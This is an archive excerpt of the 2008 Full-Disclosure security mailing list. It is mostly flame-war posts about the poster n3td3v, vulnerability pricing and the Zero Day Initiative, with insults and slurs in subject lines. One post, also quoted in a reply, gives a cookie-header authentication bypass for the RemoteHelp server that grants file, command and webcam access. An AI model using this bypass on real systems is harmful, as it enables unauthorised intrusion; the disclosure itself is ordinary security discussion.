	<4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com>
	<6158bb410804021715l29dafd00i1ba25ca63eb723bd@mail.gmail.com>
	<2d792fb20804030620i795b851cu90c69b3f37dd82e5@mail.gmail.com>
Message-ID: <6158bb410804040731l51df3697tf9d0aa1100d3d239@mail.gmail.com>

im trying not to form an opinion, but the general consensus doesnt seem very
high.

On Thu, Apr 3, 2008 at 9:20 AM, Razi Shaban <razishaban at gmail.com> wrote:

> Actually, you're representing the opinion of the majority of the list.
> n3td3v is undoubtably one of the most annoying posters, with an
> amazingly inflated sense of self-worth.
>
>
> --
> Razi
>
> On 4/3/08, Ureleet <ureleet at gmail.com> wrote:
> > you are the one bragging about making a difference, all i see is you
> being
> > annoying.  but i don't know ur full history on the mailing list, but
> from
> > what i see, its not very positive.
> >
> > and am i annoying everyone?  or just you.  speaking about stopping the
> storm
> > worm and trying to stop the storm worm are two different things.
> >
> > On Wed, Apr 2, 2008 at 7:13 PM, n3td3v <xploitable at gmail.com> wrote:
> >  > On Wed, Apr 2, 2008 at 11:46 PM, Ureleet <ureleet at gmail.com> wrote:
> > >  > you like him because he posts ur articles.
> > >  >
> > >  >  you can have him.
> >  >  >
> > >  >  stop trolling.
> > >
> > >  I'm the one at the forefront of security trying to make a difference,
> > >  and what are you? He supports me because of my cause to stop the
> Storm
> > >  Worm, so what solutions have you got, instead of annoying everyone?
> >  >
> >
> >
> > _______________________________________________
> >  Full-Disclosure - We believe in it.
> >  Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> >  Hosted and sponsored by Secunia - http://secunia.com/
> >
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/1827e018/attachment.html 

From ureleet at gmail.com  Fri Apr  4 15:28:58 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 10:28:58 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>

ive dealt a bit with tipping point and their zdi.  how about you learn how
it works first, the come back and criticize it?  you obviously dont
understand the contest at cansecwest, or how zdi plays into it.  i was
there, it was a good conf.
but you need to learn how it works before you go ranting about it....
 again...

On Thu, Apr 3, 2008 at 5:38 PM, n3td3v <xploitable at gmail.com> wrote:

>
> On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff <groffg at gmgdesign.com>
> wrote:
> > Regarding the particular person in question, I'll defer to others who
> know
> > him (or her, or they, or whomever) better than I do. Instead, I'll say
> that,
> > generally, on lists like FD, there is a minority of out-spoken
> personalities
> > who sadly support the stereotypical hacker persona: condescending
> egoists
> > who are socially inept and emotionally charged when discussing topics
> that
> > relate to their knowledge domain. That's unfortunate, since the broader
> IT
> > security community is poorly represented due to attention-seeking
> zealots.
> >
> > Regarding the idea of "oulawing security conference spamming," I'd say
> the
> > literal idea of outlawing cross-posts to multiple security mailing lists
> is
> > a bad idea. The idea that the legislature should write into law
> legislation
> > that reduces our freedom in such a sense is a slippery slope borne of
> > emotionalism and narrowness. What else should the government do to
> curtail
> > our freedoms? I tend to side with libertarian types (though I don't call
> > myself a "libertarian" un-qualified) on what the government should do
> and
> > what they should not do. And micro-manage security mailing lists is
> > something they should not do. It's a bad idea and would make a dreadful
> > precedent.
>
> Full-Disclosure is ment to be about free source, not making money. I'm
> against people who make money come on the mailing lists, its
> commerical spam. We can't allow this to continue, here are what I
> don't like:
>
> - Come to our conference - profit... buy our ticket, get a macbook prize.
>
> - Hacking challenge prize - profit... they give you $5000 and sell it
> to the vendor for a lot more.
>
> - Train to use our software -profit... over priced training for
> software... not interested.
>
> On the issue of how much a vulnerability is worth, the prices are not
> regulated, we need regulation into how much a vulnerability costs,
> because the prices right now are wild. We need to take vulnerability
> pricing off the blackmarket and onto a legitimate central website for
> selling vulnerabilities, or cash rewards for disclosing a
> vulnerability to a particular company or organisation. I don't like
> sites like digital armaments which when i visited it, the content and
> answers they gave were questionable, and people have complained about
> digital armaments in the past. Its time to get pricing regulated and
> defined, so everyone knows whos being joe jobbed and who isn't.
>
> Can someone post to full-disclosure a price list of what they think a
> bufferoverflow should be worth etc, and we can vote if we agree.
>
> So what i'm calling for is someone to post up a hackers price list per
> vulnerability type.
>
> XSS/SQL should be worth something as well, so Morning_Wood can buy
> milk and a news paper in the mornings after he's taken care of his
> wood.
>
> Sorry i've ended this e-mail with slightly off-topicness, but I do
> think pricing needs to be defined.
>
> We can't dress up cash prizes/contests as something else as well, if a
> website is offering a $5,000 reward for a vulnerability, we need to
> know if we're being ripped off with the cash reward and how much can
> be potentially made after its sold on.
>
> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> reward might not be enough money, compared to what a vulnerability
> *should* be worth, and taking into consideration how much profit
> CanSecWest make overall from people attending the conference.
>
> So you take into consideration how much a vulnerability should be
> worth, then the added worth because its a security conference of how
> much should be added on to counter the profit being made by the event.
>
> A vulnerability should be worth more if its disclosed at a security
> conference than if its bought privately, because you've got to take in
> profit  and free advertsing to calculate.
>
> However, to round off, we can't allow the mailing lists to turn into a
> vulnerability market place, full-disclosure should be for free stuff,
> and other websites and mailing lists can be setup for *money making
> schemes and auctions*.
>
> We shouldn't allow the money makers directly to market X... if a link
> is put on Full-Disclosure by a member of the public on the fly then
> thats ok, but I think its cheeky for the particular conference,
> contest runner or software trainer to be on the list themselves
> spamming everyone, for a profiteering agenda.
>
> You mention cross-posting, thats not the issue here, its the people
> making the money posting to make the money that offends me so much.
>
> And not even the lonely hacker offends me who posts i've got a
> vulnerability for sale for X, I don't mind that on Full-Disclosure,
> but what I do mind is if its a company or organisation doing it that
> is directly the ones making the money via vulnerability for sale,
> prize contest, security conference or train to use our software!!!,
> thats the height of spam I just think is utterly wrong and unethical
> on any scale of acceptability.
>
> If a lonley hacker who works in a supermarket has a vulnerabilty to
> sell i'm all for it being post on full-disclosure, but not the big
> money conferences, prize hacking contests and software training guys.
>
> I come under the bracket as supermarket worker with nothing much going
> for me in life, so I should be allowed to sell a vulnerability on
> what's ment to be a mailing list for non-profit disclosure.
>
> If we tolerate the money making schemes much longer, eventually
> full-disclosure will be a wash with conference,training,cash prize
> spam, etc once everyone realises the full value of vulnerabilities and
> the huge amounts of money to be made from setting up a cash prize
> contest, the huge amounts of money to be made from setting up a
> security conference and the huge amounts of money to be made from
> training people to use your hax0r software.
>
> You will find it easy to shout me down and say n3td3v's an idiot, but
> wait to the vulnerability market really takes off and the prices of
> vulnerabilities are properly defined and regulated, you're going to
> see a huge increase in commercial spam on the mailing lists, like the
> full-disclosure mailing list. so we've got to define what's fair play
> e-mail and what's a company or organisation blatantly profiteering
> with X method of extracting money out of people and using skilled
> hackers to make money, and to promote a security conference, training
> etc.
>
> All the best,
>
> n3td3v
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/41b56fe5/attachment.html 

From ureleet at gmail.com  Fri Apr  4 15:33:33 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 10:33:33 -0400
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length
	Encoding Heap Overflow Vulnerability
In-Reply-To: <OFCBB3C2B1.C08F0061-ON88257420.00774D58-86257420.00785915@3com.com>
References: <OFCBB3C2B1.C08F0061-ON88257420.00774D58-86257420.00785915@3com.com>
Message-ID: <6158bb410804040733t5907006fg75a6c32d80cff145@mail.gmail.com>

dear zdi,
please instruct n3td3v on your process.  oh sorry you already have in every
email alert that you send!

"Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

   http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

   http://www.zerodayinitiative.com/advisories/disclosure_policy/"<http://www.zerodayinitiative.com/advisories/disclosure_policy/>


thanks.



On Thu, Apr 3, 2008 at 5:54 PM, <zdi-disclosures at 3com.com> wrote:

> ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow
> Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-08-018
> April 3, 2008
>
> -- CVE ID:
> CVE-2008-1021
>
> -- Affected Vendors:
> Apple
>
> -- Affected Products:
> Apple Quicktime 7.4.1
>
> -- TippingPoint(TM) IPS Customer Protection:
> TippingPoint IPS customers have been protected against this
> vulnerability by Digital Vaccine protection filter ID 5998.
> For further product information on the TippingPoint IPS, visit:
>
>    http://www.tippingpoint.com
>
> -- Vulnerability Details:
> This vulnerability allows attackers to execute arbitrary code on
> vulnerable installations of Apple QuickTime Player. User interaction is
> required to exploit this vulnerability in that the target must visit a
> malicious page or open a malicious file.
>
> The specific flaw exists within the parsing of QuickTime files that
> utilize the Animation codec. A lack of proper length checks can result
> in a heap based buffer overflow leading to arbitrary code execution
> under the context of the currently logged in user.
>
> -- Vendor Response:
> Apple has issued an update to correct this vulnerability. More
> details can be found at:
>
> http://support.apple.com/kb/HT1241
>
> -- Disclosure Timeline:
> 2008-02-07 - Vulnerability reported to vendor
> 2008-04-03 - Coordinated public release of advisory
>
> -- Credit:
> This vulnerability was discovered by:
>    * Anonymous
>
> -- About the Zero Day Initiative (ZDI):
> Established by TippingPoint, The Zero Day Initiative (ZDI) represents
> a best-of-breed model for rewarding security researchers for responsibly
> disclosing discovered vulnerabilities.
>
> Researchers interested in getting paid for their security research
> through the ZDI can find more information and sign-up at:
>
>    http://www.zerodayinitiative.com
>
> The ZDI is unique in how the acquired vulnerability information is
> used. TippingPoint does not re-sell the vulnerability details or any
> exploit code. Instead, upon notifying the affected product vendor,
> TippingPoint provides its customers with zero day protection through
> its intrusion prevention technology. Explicit details regarding the
> specifics of the vulnerability are not exposed to any parties until
> an official vendor patch is publicly available. Furthermore, with the
> altruistic aim of helping to secure a broader user base, TippingPoint
> provides this vulnerability information confidentially to security
> vendors (including competitors) who have a vulnerability protection or
> mitigation product.
>
> Our vulnerability disclosure policy is available online at:
>
>    http://www.zerodayinitiative.com/advisories/disclosure_policy/
>
> CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
> is being sent by 3Com for the sole use of the intended recipient(s) and
> may contain confidential, proprietary and/or privileged information.
> Any unauthorized review, use, disclosure and/or distribution by any
> recipient is prohibited.  If you are not the intended recipient, please
> delete and/or destroy all copies of this message regardless of form and
> any included attachments and notify 3Com immediately by contacting the
> sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/ba375228/attachment.html 

From mastahflank at gmail.com  Fri Apr  4 15:34:00 2008
From: mastahflank at gmail.com (=?utf-8?B?am9zaA==?=)
Date: Fri, 4 Apr 2008 14:34:00 +0000
Subject: [Full-disclosure] angry
In-Reply-To: <8b88d71c0804040722y6fe0c45cpf9948fe799fa88c0@mail.gmail.com>
References: <a0902a9c0804031550xf561d0dwc27f147d6ed39926@mail.gmail.com><8b88d71c0804040722y6fe0c45cpf9948fe799fa88c0@mail.gmail.com>
Message-ID: <384021458-1207319639-cardhu_decombobulator_blackberry.rim.net-641403760-@bxe032.bisx.prod.on.blackberry>

Absolutely! ...


Sent from my BlackBerry? smartphone with SprintSpeed

-----Original Message-----
From: Urlan <urlancomp at gmail.com>

Date: Fri, 4 Apr 2008 11:22:17 
To:full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] angry


F?cil, ? s? sair da lista =D.

Urlan


On Thu, Apr 3, 2008 at 7:50 PM, RM <randallm at fidmail.com <mailto:randallm at fidmail.com> > wrote:
 Sorry. I am angry and tired.

"I WANT STUPID NON-ENGLISH SPEAKING? IDIOTS TO STOP SPAMMING ME WITH YOUR MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!
 
-- 
There, I feel better.
 
_______________________________________________
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html <http://lists.grok.org.uk/full-disclosure-charter.html> 
 Hosted and sponsored by Secunia - http://secunia.com/ <http://secunia.com/> 

 _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From Valdis.Kletnieks at vt.edu  Fri Apr  4 15:45:05 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 04 Apr 2008 10:45:05 -0400
Subject: [Full-disclosure] angry
In-Reply-To: Your message of "Thu, 03 Apr 2008 17:50:12 CDT."
	<a0902a9c0804031550xf561d0dwc27f147d6ed39926@mail.gmail.com>
References: <a0902a9c0804031550xf561d0dwc27f147d6ed39926@mail.gmail.com>
Message-ID: <3136.1207320305@turing-police.cc.vt.edu>

On Thu, 03 Apr 2008 17:50:12 CDT, RM said:

> "I WANT STUPID NON-ENGLISH SPEAKING  IDIOTS TO STOP SPAMMING ME WITH YOUR
> MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

Quite often, the mis-spellings are *intentional*.  If you're trying to get the
word 'penis' through a spam/content filter that catches penis, p3nis, peenis,
and a lot of other variants, you often need to get creative indeed in your
typography....

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/f57b9312/attachment.bin 

From wh1t3h4t3 at yahoo.co.uk  Fri Apr  4 15:48:12 2008
From: wh1t3h4t3 at yahoo.co.uk (Micheal Turner)
Date: Fri, 4 Apr 2008 15:48:12 +0100 (BST)
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security State
	Release 0012a
Message-ID: <805292.91098.qm@web23315.mail.ird.yahoo.com>

      n3td3v agenda & Cyber Security group
      ====================================

 Solid Information Security State Release #0012a

MARKING: RESTRICTIONS APPLY.
FAO: WORLD LEADERS

== Introduction ==
Serious high-risk ultra critical vulnerability has
been identified in Remote Help application that maybe
used by CIA, NSA and FBI employees when helping
colleagues on anti-terror campaigns.RemoteHelp is a
minimal http server that allows to view and control a
remote pc running a 32-bits version of Microsoft
Windows.
current version is 0.0.6 and runs stand-alone or
installs as a service.

== URL ==
http://sourceforge.net/projects/remotehelp/ 

== HISTORY ==
After n3td3v agenda emailed the NSA, SANS and all
information security groups and was found not to be
taken seriously. High risk proof of concept exploit
code has been authored for severe vulnerability in
Remote Help application which maybe used by any number
of Yahoo!, Google!, Ebay! or NSA employees. This
vulnerability gives rise to serious national
infrastructure risk and should not be under estimated!

== Proof of Concept ==
I found a vulnerability in the pages.c file which
generates the login page dialog and authenticates a
user after it checks if your "user" and "pass"
parameter match the defaults
(user/default) it does this:

   strncpy(cookie,"user=default; path=/; expires=Sun,
11-May-2030 22:11:40 GMT",1024);

for a valid login and for an invalid login it sets an
expired cookie like so;
   strncpy(cookie,"user=default; path=/; expires=Sun,
11-May-1970 22:11:40 GMT",1024);

all you have to do is add "Cookie: user=default;
path=/; expires=Sun, 11-May-2030 22:11:40 GMT" to your
HTTP request and you can bypass
authentication to the Remote Help server and access
the filesystem/exec commands/view the webcam of the
hosts running it.

== Credit ==

n3td3v & documentation help by Michael Turner.

"Never trust your employees."


      ___________________________________________________________ 
Yahoo! For Good helps you make a difference  

http://uk.promotions.yahoo.com/forgood/



From kurtdillard at msn.com  Fri Apr  4 16:20:56 2008
From: kurtdillard at msn.com (Kurt Dillard)
Date: Fri, 4 Apr 2008 12:20:56 -0300
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security
	State	Release 0012a
In-Reply-To: <805292.91098.qm@web23315.mail.ird.yahoo.com>
References: <805292.91098.qm@web23315.mail.ird.yahoo.com>
Message-ID: <BAY134-DAV65BEECD784D97B391722DA7F60@phx.gbl>

Whether or not the vulnerability exists as described this email is
laughable. Addressing it to "world leaders" shows everyone you're a
self-deceiving egomaniac. Complaining that the NSA, CIA, and FBI didn't
respond to your ravings makes perfect sense for 3 reasons: first, nobody
takes such poorly written rants seriously. Second, those agencies don't to
collect vulnerability data, that's the job of DHS and NIST with their NVD
and US-CERT projects. Third, I've worked with a lot of federal agencies and
none of them use this software, why would they when a perfectly usable
remote assistance technology is already built into Windows? Oh, and by the
way, employees at those agencies can't install the software themselves
because their desktops are locked down and they don't have admin privileges.

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Micheal
Turner
Sent: Friday, April 04, 2008 11:48 AM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security State
Release 0012a

      n3td3v agenda & Cyber Security group
      ====================================

 Solid Information Security State Release #0012a

MARKING: RESTRICTIONS APPLY.
FAO: WORLD LEADERS

== Introduction ==
Serious high-risk ultra critical vulnerability has
been identified in Remote Help application that maybe
used by CIA, NSA and FBI employees when helping
colleagues on anti-terror campaigns.RemoteHelp is a
minimal http server that allows to view and control a
remote pc running a 32-bits version of Microsoft
Windows.
current version is 0.0.6 and runs stand-alone or
installs as a service.

== URL ==
http://sourceforge.net/projects/remotehelp/ 

== HISTORY ==
After n3td3v agenda emailed the NSA, SANS and all
information security groups and was found not to be
taken seriously. High risk proof of concept exploit
code has been authored for severe vulnerability in
Remote Help application which maybe used by any number
of Yahoo!, Google!, Ebay! or NSA employees. This
vulnerability gives rise to serious national
infrastructure risk and should not be under estimated!

== Proof of Concept ==
I found a vulnerability in the pages.c file which
generates the login page dialog and authenticates a
user after it checks if your "user" and "pass"
parameter match the defaults
(user/default) it does this:

   strncpy(cookie,"user=default; path=/; expires=Sun,
11-May-2030 22:11:40 GMT",1024);

for a valid login and for an invalid login it sets an
expired cookie like so;
   strncpy(cookie,"user=default; path=/; expires=Sun,
11-May-1970 22:11:40 GMT",1024);

all you have to do is add "Cookie: user=default;
path=/; expires=Sun, 11-May-2030 22:11:40 GMT" to your
HTTP request and you can bypass
authentication to the Remote Help server and access
the filesystem/exec commands/view the webcam of the
hosts running it.

== Credit ==

n3td3v & documentation help by Michael Turner.

"Never trust your employees."


      ___________________________________________________________ 
Yahoo! For Good helps you make a difference  

http://uk.promotions.yahoo.com/forgood/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From techie.micheal at gmail.com  Fri Apr  4 16:30:41 2008
From: techie.micheal at gmail.com (Micheal Cottingham)
Date: Fri, 4 Apr 2008 11:30:41 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
Message-ID: <fec013240804040830i2fa6a097hc463687c6ef0612e@mail.gmail.com>

I too have participated in ZDI as a researcher. It is a very good
program, and both the company and the researcher get what they want
out of the process. The company gets the time to fix the vulnerability
before everybody else finds out, and the researcher gets the
recognition (and some money) for their work. It is a win-win
situation.

On Fri, Apr 4, 2008 at 10:28 AM, Ureleet <ureleet at gmail.com> wrote:
> ive dealt a bit with tipping point and their zdi.  how about you learn how
> it works first, the come back and criticize it?  you obviously dont
> understand the contest at cansecwest, or how zdi plays into it.  i was
> there, it was a good conf.
>
> but you need to learn how it works before you go ranting about it....
> again...
>
>
>
> On Thu, Apr 3, 2008 at 5:38 PM, n3td3v <xploitable at gmail.com> wrote:
>
> >
> >
> > On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff <groffg at gmgdesign.com>
> wrote:
> > > Regarding the particular person in question, I'll defer to others who
> know
> > > him (or her, or they, or whomever) better than I do. Instead, I'll say
> that,
> > > generally, on lists like FD, there is a minority of out-spoken
> personalities
> > > who sadly support the stereotypical hacker persona: condescending
> egoists
> > > who are socially inept and emotionally charged when discussing topics
> that
> > > relate to their knowledge domain. That's unfortunate, since the broader
> IT
> > > security community is poorly represented due to attention-seeking
> zealots.
> > >
> > > Regarding the idea of "oulawing security conference spamming," I'd say
> the
> > > literal idea of outlawing cross-posts to multiple security mailing lists
> is
> > > a bad idea. The idea that the legislature should write into law
> legislation
> > > that reduces our freedom in such a sense is a slippery slope borne of
> > > emotionalism and narrowness. What else should the government do to
> curtail
> > > our freedoms? I tend to side with libertarian types (though I don't call
> > > myself a "libertarian" un-qualified) on what the government should do
> and
> > > what they should not do. And micro-manage security mailing lists is
> > > something they should not do. It's a bad idea and would make a dreadful
> > > precedent.
> >
> > Full-Disclosure is ment to be about free source, not making money. I'm
> > against people who make money come on the mailing lists, its
> > commerical spam. We can't allow this to continue, here are what I
> > don't like:
> >
> > - Come to our conference - profit... buy our ticket, get a macbook prize.
> >
> > - Hacking challenge prize - profit... they give you $5000 and sell it
> > to the vendor for a lot more.
> >
> > - Train to use our software -profit... over priced training for
> > software... not interested.
> >
> > On the issue of how much a vulnerability is worth, the prices are not
> > regulated, we need regulation into how much a vulnerability costs,
> > because the prices right now are wild. We need to take vulnerability
> > pricing off the blackmarket and onto a legitimate central website for
> > selling vulnerabilities, or cash rewards for disclosing a
> > vulnerability to a particular company or organisation. I don't like
> > sites like digital armaments which when i visited it, the content and
> > answers they gave were questionable, and people have complained about
> > digital armaments in the past. Its time to get pricing regulated and
> > defined, so everyone knows whos being joe jobbed and who isn't.
> >
> > Can someone post to full-disclosure a price list of what they think a
> > bufferoverflow should be worth etc, and we can vote if we agree.
> >
> > So what i'm calling for is someone to post up a hackers price list per
> > vulnerability type.
> >
> > XSS/SQL should be worth something as well, so Morning_Wood can buy
> > milk and a news paper in the mornings after he's taken care of his
> > wood.
> >
> > Sorry i've ended this e-mail with slightly off-topicness, but I do
> > think pricing needs to be defined.
> >
> > We can't dress up cash prizes/contests as something else as well, if a
> > website is offering a $5,000 reward for a vulnerability, we need to
> > know if we're being ripped off with the cash reward and how much can
> > be potentially made after its sold on.
> >
> > Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> > vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> > reward might not be enough money, compared to what a vulnerability
> > *should* be worth, and taking into consideration how much profit
> > CanSecWest make overall from people attending the conference.
> >
> > So you take into consideration how much a vulnerability should be
> > worth, then the added worth because its a security conference of how
> > much should be added on to counter the profit being made by the event.
> >
> > A vulnerability should be worth more if its disclosed at a security
> > conference than if its bought privately, because you've got to take in
> > profit  and free advertsing to calculate.
> >
> > However, to round off, we can't allow the mailing lists to turn into a
> > vulnerability market place, full-disclosure should be for free stuff,
> > and other websites and mailing lists can be setup for *money making
> > schemes and auctions*.
> >
> > We shouldn't allow the money makers directly to market X... if a link
> > is put on Full-Disclosure by a member of the public on the fly then
> > thats ok, but I think its cheeky for the particular conference,
> > contest runner or software trainer to be on the list themselves
> > spamming everyone, for a profiteering agenda.
> >
> > You mention cross-posting, thats not the issue here, its the people
> > making the money posting to make the money that offends me so much.
> >
> > And not even the lonely hacker offends me who posts i've got a
> > vulnerability for sale for X, I don't mind that on Full-Disclosure,
> > but what I do mind is if its a company or organisation doing it that
> > is directly the ones making the money via vulnerability for sale,
> > prize contest, security conference or train to use our software!!!,
> > thats the height of spam I just think is utterly wrong and unethical
> > on any scale of acceptability.
> >
> > If a lonley hacker who works in a supermarket has a vulnerabilty to
> > sell i'm all for it being post on full-disclosure, but not the big
> > money conferences, prize hacking contests and software training guys.
> >
> > I come under the bracket as supermarket worker with nothing much going
> > for me in life, so I should be allowed to sell a vulnerability on
> > what's ment to be a mailing list for non-profit disclosure.
> >
> > If we tolerate the money making schemes much longer, eventually
> > full-disclosure will be a wash with conference,training,cash prize
> > spam, etc once everyone realises the full value of vulnerabilities and
> > the huge amounts of money to be made from setting up a cash prize
> > contest, the huge amounts of money to be made from setting up a
> > security conference and the huge amounts of money to be made from
> > training people to use your hax0r software.
> >
> > You will find it easy to shout me down and say n3td3v's an idiot, but
> > wait to the vulnerability market really takes off and the prices of
> > vulnerabilities are properly defined and regulated, you're going to
> > see a huge increase in commercial spam on the mailing lists, like the
> > full-disclosure mailing list. so we've got to define what's fair play
> > e-mail and what's a company or organisation blatantly profiteering
> > with X method of extracting money out of people and using skilled
> > hackers to make money, and to promote a security conference, training
> > etc.
> >
> > All the best,
> >
> > n3td3v
> >
>
>
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From xploitable at gmail.com  Fri Apr  4 17:07:44 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 4 Apr 2008 17:07:44 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass
	securityconferencespamming its f****** gay
In-Reply-To: <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<27886.1207189079@turing-police.cc.vt.edu>
	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>
	<030b01c89543$0b481540$6401a8c0@maryl>
	<C4B44D4D4D0053622A781365@Macintosh.local>
	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>
	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>
	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
	<6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
Message-ID: <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>

On Fri, Apr 4, 2008 at 3:28 PM, Ureleet <ureleet at gmail.com> wrote:
> ive dealt a bit with tipping point and their zdi.  how about you learn how
> it works first, the come back and criticize it?

I never once mentioned anything about the zero day initiative? Can you
find where I mentioned about the zero day initiative.
They have nothing to do with this, they don't spam the mailing lists
to make money. All i've seen them do is disclose vulnerabilities,
which is fair play e-mail. I'm a big fan of the zero day initiative, I
have no gripes with them whatsoever.

Regards,

n3td3v



From xploitable at gmail.com  Fri Apr  4 17:37:07 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 4 Apr 2008 17:37:07 +0100
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length
	Encoding Heap Overflow Vulnerability
In-Reply-To: <6158bb410804040733t5907006fg75a6c32d80cff145@mail.gmail.com>
References: <OFCBB3C2B1.C08F0061-ON88257420.00774D58-86257420.00785915@3com.com>
	<6158bb410804040733t5907006fg75a6c32d80cff145@mail.gmail.com>
Message-ID: <4b6ee9310804040937h7d3f81cpb7a1e13312ca72d1@mail.gmail.com>

On Fri, Apr 4, 2008 at 3:33 PM, Ureleet <ureleet at gmail.com> wrote:
> dear zdi,
>
> please instruct n3td3v on your process.  oh sorry you already have in every
> email alert that you send!

I never once mentioned anything about the zero day initiative? Can you
find where I mentioned about the zero day initiative.
They have nothing to do with this, they don't spam the mailing lists
to make money. All i've seen them do is disclose vulnerabilities,
which is fair play e-mail. I'm a big fan of the zero day initiative, I
have no gripes with them whatsoever.

Regards,

n3td3v



From security at brvenik.com  Fri Apr  4 16:47:54 2008
From: security at brvenik.com (Jason)
Date: Fri, 04 Apr 2008 11:47:54 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw
 mass	securityconferencespamming its f****** gay
In-Reply-To: <fec013240804040830i2fa6a097hc463687c6ef0612e@mail.gmail.com>
